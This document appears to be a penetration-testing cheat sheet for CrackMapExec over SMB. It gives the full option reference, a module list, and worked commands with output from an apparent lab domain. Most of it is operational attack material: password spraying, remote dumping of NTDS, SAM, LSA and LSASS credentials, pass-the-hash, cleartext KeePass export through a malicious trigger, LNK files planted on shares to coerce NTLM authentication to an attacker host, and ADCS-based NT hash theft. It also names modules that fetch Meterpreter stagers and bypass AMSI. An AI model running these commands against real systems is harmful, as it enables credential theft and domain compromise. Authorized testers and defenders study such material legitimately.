SMB
Installation
Install CrackMapExec
Usage
cme smb [-h] [-id CRED_ID [CRED_ID ...]] [-u USERNAME [USERNAME ...]] [-p PASSWORD [PASSWORD ...]] [-k] [--no-bruteforce] [--continue-on-success] [--use-kcache] [--log LOG] [--aesKey AESKEY [AESKEY ...]]
[--kdcHost KDCHOST] [--gfail-limit LIMIT | --ufail-limit LIMIT | --fail-limit LIMIT] [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L] [--options] [--server {https,http}] [--server-host HOST]
[--server-port PORT] [--connectback-host CHOST] [-H HASH [HASH ...]] [-d DOMAIN | --local-auth] [--port {139,445}] [--share SHARE] [--smb-server-port SMB_SERVER_PORT] [--gen-relay-list OUTPUT_FILE]
[--smb-timeout SMB_TIMEOUT] [--laps [LAPS]] [--sam] [--lsa] [--ntds [{drsuapi,vss}]] [--dpapi [{password,cookies}]] [--mkfile MKFILE] [--pvk PVK] [--enabled] [--user USERNTDS] [--shares]
[--filter-shares FILTER_SHARES [FILTER_SHARES ...]] [--sessions] [--disks] [--loggedon-users-filter LOGGEDON_USERS_FILTER] [--loggedon-users] [--users [USER]] [--groups [GROUP]] [--computers [COMPUTER]]
[--local-groups [GROUP]] [--pass-pol] [--rid-brute [MAX_RID]] [--wmi QUERY] [--wmi-namespace NAMESPACE] [--spider SHARE] [--spider-folder FOLDER] [--content] [--exclude-dirs DIR_LIST]
[--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]] [--depth DEPTH] [--only-files] [--put-file FILE FILE] [--get-file FILE FILE] [--append-host] [--exec-method {atexec,mmcexec,wmiexec,smbexec}]
[--codec CODEC] [--force-ps32] [--no-output] [-x COMMAND | -X PS_COMMAND] [--obfs] [--amsi-bypass FILE] [--clear-obfscripts]
target [target ...]Flags
positional arguments:
target the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)
options:
-h, --help show this help message and exit
-id CRED_ID [CRED_ID ...]
database credential ID(s) to use for authentication
-u USERNAME [USERNAME ...]
username(s) or file(s) containing usernames
-p PASSWORD [PASSWORD ...]
password(s) or file(s) containing passwords
-k, --kerberos Use Kerberos authentication
--no-bruteforce No spray when using file for username and password (user1 => password1, user2 => password2
--continue-on-success
continues authentication attempts even after successes
--use-kcache Use Kerberos authentication from ccache file (KRB5CCNAME)
--log LOG Export result into a custom file
--aesKey AESKEY [AESKEY ...]
AES key to use for Kerberos Authentication (128 or 256 bits)
--kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
--gfail-limit LIMIT max number of global failed login attempts
--ufail-limit LIMIT max number of failed login attempts per username
--fail-limit LIMIT max number of failed login attempts per host
-M MODULE, --module MODULE
module to use
-o MODULE_OPTION [MODULE_OPTION ...]
module options
-L, --list-modules list available modules
--options display module options
--server {https,http}
use the selected server (default: https)
--server-host HOST IP to bind the server to (default: 0.0.0.0)
--server-port PORT start the server on the specified port
--connectback-host CHOST
IP for the remote system to connect back to (default: same as server-host)
-H HASH [HASH ...], --hash HASH [HASH ...]
NTLM hash(es) or file(s) containing NTLM hashes
-d DOMAIN domain to authenticate to
--local-auth authenticate locally to each target
--port {139,445} SMB port (default: 445)
--share SHARE specify a share (default: C$)
--smb-server-port SMB_SERVER_PORT
specify a server port for SMB
--gen-relay-list OUTPUT_FILE
outputs all hosts that don't require SMB signing to the specified file
--smb-timeout SMB_TIMEOUT
SMB connection timeout, default 2 secondes
--laps [LAPS] LAPS authentification
Credential Gathering:
Options for gathering credentials
--sam dump SAM hashes from target systems
--lsa dump LSA secrets from target systems
--ntds [{drsuapi,vss}]
dump the NTDS.dit from target DCs using the specifed method (default: drsuapi)
--dpapi [{password,cookies}]
dump DPAPI secrets from target systems, can dump cookies if you add "cookies" (default: password)
Credential Gathering:
Options for gathering credentials
--mkfile MKFILE DPAPI option. File with masterkeys in form of {GUID}:SHA1
--pvk PVK DPAPI option. File with domain backupkey
--enabled Only dump enabled targets from DC
--user USERNTDS Dump selected user from DC
Mapping/Enumeration:
Options for Mapping/Enumerating
--shares enumerate shares and access
--filter-shares FILTER_SHARES [FILTER_SHARES ...]
Filter share by access, option 'read' 'write' or 'read,write'
--sessions enumerate active sessions
--disks enumerate disks
--loggedon-users-filter LOGGEDON_USERS_FILTER
only search for specific user, works with regex
--loggedon-users enumerate logged on users
--users [USER] enumerate domain users, if a user is specified than only its information is queried.
--groups [GROUP] enumerate domain groups, if a group is specified than its members are enumerated
--computers [COMPUTER]
enumerate computer users
--local-groups [GROUP]
enumerate local groups, if a group is specified then its members are enumerated
--pass-pol dump password policy
--rid-brute [MAX_RID]
enumerate users by bruteforcing RID's (default: 4000)
--wmi QUERY issues the specified WMI query
--wmi-namespace NAMESPACE
WMI Namespace (default: root\cimv2)
Spidering:
Options for spidering shares
--spider SHARE share to spider
--spider-folder FOLDER
folder to spider (default: root share directory)
--content enable file content searching
--exclude-dirs DIR_LIST
directories to exclude from spidering
--pattern PATTERN [PATTERN ...]
pattern(s) to search for in folders, filenames and file content
--regex REGEX [REGEX ...]
regex(s) to search for in folders, filenames and file content
--depth DEPTH max spider recursion depth (default: infinity & beyond)
--only-files only spider files
Files:
Options for put and get remote files
--put-file FILE FILE Put a local file into remote target, ex: whoami.txt \\Windows\\Temp\\whoami.txt
--get-file FILE FILE Get a remote file, ex: \\Windows\\Temp\\whoami.txt whoami.txt
--append-host append the host to the get-file filename
Command Execution:
Options for executing commands
--exec-method {atexec,mmcexec,wmiexec,smbexec}
method to execute the command. Ignored if in MSSQL mode (default: wmiexec)
--codec CODEC Set encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target, map the result with
https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the corresponding codec
--force-ps32 force the PowerShell command to run in a 32-bit process
--no-output do not retrieve command output
-x COMMAND execute the specified command
-X PS_COMMAND execute the specified PowerShell command
Powershell Obfuscation:
Options for PowerShell script obfuscation
--obfs Obfuscate PowerShell scripts
--amsi-bypass FILE File with a custom AMSI bypass
--clear-obfscripts Clear all cached obfuscated PowerShell scriptsModules
The modules below can be used with the -M option.
[*] add-computer Adds or deletes a domain computer
[*] bh_owned Set pwned computer as owned in Bloodhound
[*] dfscoerce Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable share
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_av Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] firefox Dump credentials from Firefox
[*] get_netconnections Uses WMI to query network connections.
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
[*] hash_spider Dump lsass recursively from a given hash using BH to find local admins
[*] iis Checks for credentials in IIS Application Pool configuration files using appcmd.exe
[*] impersonate List and impersonate tokens to run command as locally logged on users
[*] install_elevated Checks for AlwaysInstallElevated
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] keepass_discover Search for KeePass-related files and process.
[*] keepass_trigger Set up a malicious KeePass trigger to export the database in cleartext.
[*] lsassy Dump lsass and parse the result remotely with lsassy
[*] masky Remotely dump domain user credentials via an ADCS and a KDC
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] ms17-010 MS17-010, /!\ not tested oustide home lab
[*] msol Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] nopac Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] ntdsutil Dump NTDS with ntdsutil
[*] ntlmv1 Detect if lmcompatibilitylevel on the target is set to 0 or 1
[*] petitpotam Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] pi Run command as logged on users via Process Injection
[*] printnightmare Check if host vulnerable to printnightmare
[*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
[*] rdcman Remotely dump Remote Desktop Connection Manager (sysinternals) credentials
[*] rdp Enables/Disables RDP
[*] reg-query Performs a registry query on the machine
[*] runasppl Check if the registry value RunAsPPL is set or not
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
[*] spider_plus List files recursively (excluding `EXCLUDE_FILTER` and `EXCLUDE_EXTS` extensions) and save JSON share-file metadata to the `OUTPUT_FOLDER`. If `DOWNLOAD_FLAG`=True, download files smaller then `MAX_FILE_SIZE` to the `OUTPUT_FOLDER`.
[*] spooler Detect if print spooler is enabled or not
[*] teams_localdb Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
[*] test_connection Pings a host
[*] uac Checks UAC status
[*] veeam Extracts credentials from local Veeam SQL Database
[*] wcc Check various security configuration items on Windows machines
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
[*] webdav Checks whether the WebClient service is running on the target
[*] wifi Get key of all wireless interfaces
[*] winscp Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472Handy one-liners
For local authentication, add the --local-auth flag to the command.
Dump NTDS
cme smb <target> -u <user> -p <password> --ntdsDump NTDS history
cme smb <target> -u <user> -p <password> --ntds-historyDump SAM
cme smb <target> -u <user> -p <password> --samDump LSA
cme smb <target> -u <user> -p <password> --lsaDomain password spray
To find valid usernames to spray, have a look at Kerbrute.
By default CME will stop when a valid login combination is found. If you want CME to proceed with the whole list you’re trying, use the --continue-on-success flag.
cme smb <dc-ip> -u <user.txt> -p <password.txt>Dump LSASS
cme smb <target> -u <user> -p <password> -M lsassyIf the lsassy module fails, then use the following instead using sysinternals procdump:
Other modules that can be used.
- handlekatz
- nanodump
cme smb <target> -u <user> -p <password> -M lsassy -o DUMP_METHOD=2 PROCDUMP_PATH=/sysinternals/procdump.exeDump KeePass
cme smb <target> -u <user-or-admin> -p <password> -M keepass_discovercme smb <target> -u <user-or-admin> -p <password> -M keepass_trigger -o KEEPASS_CONFIG_PATH="C:\Users\crypt0rr\AppData\Roaming\KeePass\KeePass.config.xml" ACTION=ALLCheck Password Policy
cme smb <dc-ip> -u <user> -p <password> --pass-polEnable/disable RDP
ACTION can be set to enable or disable.
cme smb <target> -u <user> -p <password> -M rdp -o ACTION='enable'Enumerate shares
cme smb <target> -u <user> -p <password> --sharesPractical examples
Check targetlist
Can be used with file as input or a single IP / can also help checking SMB version and signing
$ cme smb targets.txt
SMB 10.10.10.16 445 DC2008R2 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (name:DC2008R2) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.10 445 DC2016 [*] Windows Server 2016 Standard 14393 (name:DC2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.11 445 DC2019 [*] Windows 10.0 Build 17763 (name:DC2019) (domain:offsec.nl) (signing:True) (SMBv1:False)Generate target list where targets do not require signing
$ cme smb 10.10.10.0/24 --gen-relay-list list
SMB 10.10.10.1 445 SRV2K8R2 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:SRV2K8R2) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.2 445 SRV2016 [*] Windows Server 2016 Standard 14393 x64 (name:SRV2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.3 445 WIN10 [*] Windows 10.0 Build 19041 x64 (name:WIN10) (domain:offsec.nl) (signing:False) (SMBv1:False)
$ cat list
10.10.10.3Check targets for ability to log in, and check local admin
When ‘(Pwn3d!)’ is shown, the user is ’local admin’ on the target server
$ cme smb targets -u johndo -p Welkom1234 -d offsec
SMB 10.10.10.10 445 DC2016 [*] Windows Server 2016 Standard 14393 (name:DC2016) (domain:offsec) (signing:True) (SMBv1:True)
SMB 10.10.10.16 445 DC2008R2 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (name:DC2008R2) (domain:offsec) (signing:True) (SMBv1:True)
SMB 10.10.10.11 445 DC2019 [*] Windows 10.0 Build 17763 (name:DC2019) (domain:offsec) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC2016 [+] offsec\johndo:Welkom1234 (Pwn3d!)
SMB 10.10.10.16 445 DC2008R2 [+] offsec\johndo:Welkom1234
SMB 10.10.10.11 445 DC2019 [+] offsec\johndo:Welkom1234Dump NTDS (remote)
$ cme smb 10.10.10.10 -u johndo -H caec1e1d755119a15bfb6cd3d5994305 --ntds
SMB 10.10.10.10 445 DC2016 [*] Windows Server 2016 Standard 14393 x64 (name:DC2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.10 445 DC2016 [+] offsec.nl\johndo:Welkom1234 (Pwn3d!)
SMB 10.10.10.10 445 DC2016 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.10 445 DC2016 Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
SMB 10.10.10.10 445 DC2016 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.10 445 DC2016 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
SMB 10.10.10.10 445 DC2016 offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
SMB 10.10.10.10 445 DC2016 offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:caec1e1d755119a15bfb6cd3d5994305:::The file below is a example of the full output of the command above.
Dump LSASS (remote)
$ cme smb 10.10.10.16 -u johndo -p Welkom1234 -d offsec -M lsassy
SMB 10.10.10.16 445 DC2008R2 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (name:DC2008R2) (domain:offsec) (signing:True) (SMBv1:True)
SMB 10.10.10.16 445 DC2008R2 [+] offsec\johndo:Welkom1234 (Pwn3d!)
LSASSY 10.10.10.16 445 DC2008R2 offsec\adm_johndo ThisPasswordIsToHardToCrack!
LSASSY 10.10.10.16 445 DC2008R2 offsec.NL\adm_johndo ThisPasswordIsToHardToCrack!Using procdump (sysinternals).
$ cme smb 10.10.10.10 -u johndo-adm -p Welkom1234 -M procdump
SMB 10.10.10.10 445 IITJUMPHOST [*] Windows 10.0 Build 20348 x64 (name:IITJUMPHOST) (domain:OFFSEC.nl) (signing:False) (SMBv1:False)
SMB 10.10.10.10 445 IITJUMPHOST [+] OFFSEC.nl\johndo-adm:Welkom1234 (Pwn3d!)
PROCDUMP 10.10.10.10 445 IITJUMPHOST [*] Copy /tmp/procdump.exe to C:\Windows\Temp\
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Created file procdump.exe on the \\C$\Windows\Temp\
PROCDUMP 10.10.10.10 445 IITJUMPHOST [*] Getting lsass PID tasklist /v /fo csv | findstr /i "lsass"
PROCDUMP 10.10.10.10 445 IITJUMPHOST [*] Executing command C:\Windows\Temp\procdump.exe -accepteula -ma 760 C:\Windows\Temp\%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Process lsass.exe was successfully dumped
PROCDUMP 10.10.10.10 445 IITJUMPHOST [*] Copy IITJUMPHOST-AMD64-OFFSEC.dmp to host
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Dumpfile of lsass.exe was transferred to /tmp/IITJUMPHOST-AMD64-OFFSEC.dmp
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Deleted procdump file on the C$ share
PROCDUMP 10.10.10.10 445 IITJUMPHOST [+] Deleted lsass.dmp file on the C$ share
PROCDUMP 10.10.10.10 445 IITJUMPHOST offsec.NL\adm_johndo ThisPasswordIsToHardToCrack!Other modules that can be used.
- handlekatz
- nanodump
Dump SAM (local-authentication)
$ cme smb scope.txt -u administrator -p Welkom1234 --sam --local-auth
SMB 10.10.10.10 445 DC2016 [*] Windows 10.0 Build 14393 x64 (name:DC2016) (domain:offsec.nl) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC2016 [+] offsec.nl\administrator:Welkom1234 (Pwn3d!)
SMB 10.10.10.10 445 DC2016 [+] Dumping SAM hashes
SMB 10.10.10.10 445 DC2016 Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f859684db2422704e9e4c2cd7e27b07:::
SMB 10.10.10.10 445 DC2016 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.10 445 DC2016 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.10 445 DC2016 [+] Added 3 SAM hashes to the databaseDump LSA (local-authentication)
$ cme smb scope.txt -u administrator -p 'Welkom1234' --local-auth --lsa
SMB 10.10.10.116 445 VMV07 [*] Windows Server 2016 Standard 14393 x64 (name:VMV07) (domain:VMV07) (signing:False) (SMBv1:True)
SMB 10.10.10.115 445 VMV06 [*] Windows Server 2016 Standard 14393 x64 (name:VMV06) (domain:VMV06) (signing:False) (SMBv1:True)
SMB 10.10.10.112 445 VMV03 [*] Windows Server 2016 Standard 14393 x64 (name:VMV03) (domain:VMV03) (signing:False) (SMBv1:True)
SMB 10.10.10.116 445 VMV07 [+] VMV07\administrator:Welkom1234 (Pwn3d!)
SMB 10.10.10.115 445 VMV06 [+] VMV06\administrator:Welkom1234 (Pwn3d!)
SMB 10.10.10.116 445 VMV07 offsec.nl/john.do:$DCC2$10240#john.do#fd8d7a9b530fe6978821647e3275a01f
SMB 10.10.10.110 445 VMV01 offsec.nl/john.do:$DCC2$10240#john.do#6d33d010685524188445af2dddda2c66
SMB 10.10.10.110 445 VMV01 offsec.nl/jane.do:$DCC2$10240#jane.do#e12335228dd44cb595e37afb3cb14a0cPass the Hash
$ cme smb 10.10.10.10-16 -u administrator -H 97f2592347d8fbe42be381726ff9ea83 -M lsassy
SMB 10.10.10.16 445 DC2008R2 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:DC2008R2) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.10 445 DC2016 [*] Windows Server 2016 Standard 14393 x64 (name:DC2016) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB 10.10.10.11 445 DC2019 [*] Windows 10.0 Build 17763 x64 (name:DC2019) (domain:offsec.nl) (signing:True) (SMBv1:False)
SMB 10.10.10.16 445 DC2008R2 [+] offsec.nl\administrator 97f2592347d8fbe42be381726ff9ea83 (Pwn3d!)
SMB 10.10.10.10 445 DC2016 [+] offsec.nl\administrator 97f2592347d8fbe42be381726ff9ea83 (Pwn3d!)
SMB 10.10.10.11 445 DC2019 [+] offsec.nl\administrator 97f2592347d8fbe42be381726ff9ea83 (Pwn3d!)
LSASSY 10.10.10.10 445 DC2016 [*] No credentials found
LSASSY 10.10.10.16 445 DC2008R2 [*] No credentials found
LSASSY 10.10.10.11 445 DC2019 offsec\Administrator 97f2592347d8fbe42be381726ff9ea83
LSASSY 10.10.10.11 445 DC2019 offsec.nl\Administrator Welkom1234Remote User Account Control (UAC)
If you know the user has local administrator rights but you get the error STATUS_LOGON_TYPE_NOT_GRANTED or the authentication works but not Pwn3d!, Remote User Account Control is likely to be enabled.
Have a look at Regedit - Disabled Remote UAC
$ cme smb 10.10.10.10 -u johndo -p 'Welkom1234!' --local-auth
SMB 10.10.10.10 445 WIN10 [*] Windows 10.0 Build 17763 x64 (name:WIN10) (domain:WIN10) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 WIN10 [-] WIN10\Administrator:Welkom1234! STATUS_LOGON_TYPE_NOT_GRANTEDTrigger NTLM / SMB authentication through shortcut (SLINKY)
Find a writable share.
$ cme smb 10.10.10.15 -u johndo -p 'Welkom1234!' --shares
SMB 10.10.10.15 445 SRV_FS [*] Windows 10.0 Build 19041 x64 (name:SRV_FS) (domain:OFFSEC.NL) (signing:False) (SMBv1:False)
SMB 10.10.10.15 445 SRV_FS [+] OFFSEC.NL\johndo:Welkom1234!
SMB 10.10.10.15 445 SRV_FS [+] Enumerated shares
SMB 10.10.10.15 445 SRV_FS Share Permissions Remark
SMB 10.10.10.15 445 SRV_FS ----- ----------- ------
SMB 10.10.10.15 445 SRV_FS ADMIN$ - Remote Admin
SMB 10.10.10.15 445 SRV_FS C$ - Default share
SMB 10.10.10.15 445 SRV_FS example READ,WRITE
SMB 10.10.10.15 445 SRV_FS IPC$ - Remote IPCPlace file on writable share on target system.
$ cme smb 10.10.10.15 -u johndo -p 'Welkom1234!' -M slinky -o NAME=examplefile SERVER=10.10.10.20
[!] Module is not opsec safe, are you sure you want to run this? [Y/n] y
SMB 10.10.10.15 445 SRV_FS [*] Windows 10.0 Build 19041 x64 (name:SRV_FS) (domain:OFFSEC.NL) (signing:False) (SMBv1:False)
SMB 10.10.10.15 445 SRV_FS [+] OFFSEC.NL\johndo:Welkom1234!
SLINKY 10.10.10.15 445 SRV_FS [+] Found writable share: example
SLINKY 10.10.10.15 445 SRV_FS [+] Created LNK file on the example shareClean-up the placed file.
$ cme smb 10.10.10.15 -u johndo -p 'Welkom1234!' -M slinky -o NAME=EXAMPLE SERVER=10.10.10.20 CLEANUP=True
[!] Module is not opsec safe, are you sure you want to run this? [Y/n] y
SMB 10.10.10.15 445 SRV_FS [*] Windows 10.0 Build 19041 x64 (name:SRV_FS) (domain:OFFSEC.NL) (signing:False) (SMBv1:False)
SMB 10.10.10.15 445 SRV_FS [+] OFFSEC.NL\johndo:Welkom1234!
SLINKY 10.10.10.15 445 SRV_FS [+] Found writable share: example
SLINKY 10.10.10.15 445 SRV_FS [+] Deleted LNK file on the example shareExploit ADCS to retrieve NTLM hashes for all connected users (masky)
$ cme smb 10.10.10.8 -u john-adm -p Welkom1234! -M masky -0 CA='ADCS01.offsec.nl\offsec-ADCS01-CA"
SMB 10.10.10.8 445 ADCS01 [*] Windows 10.0 Build 20348 x64 (name: ADCS01) (domain: offsec.nl) (signing: False) (SMBv1: False)
SMB 10.10.10.8 445 ADCS01 [+] offsec.nl\john-adm: Welkom1234! (Pwn3d! )
MASKY 10.10.10.8 445 ADCS01 [*] Running Masky on the targeted host
MASKY 10.10.10.8 445 ADCS01 [*] 2 session(s) successfully hijacked
MASKY 10.10.10.8 445 ADCS01 [*] Attempting to retrieve NT hash(es) via PKINIT
MASKY 10.10.10.8 445 ADCS01 offsec\john-adm 97f2592347d8fbe42be381726ff9ea83
MASKY 10.10.10.8 445 ADCS01 offsec\administrator 97f2592347d8fbe42be381726ff9ea83
MASKY 10.10.10.8 445 ADCS01 [+] 2 NT hash(es) successfully collected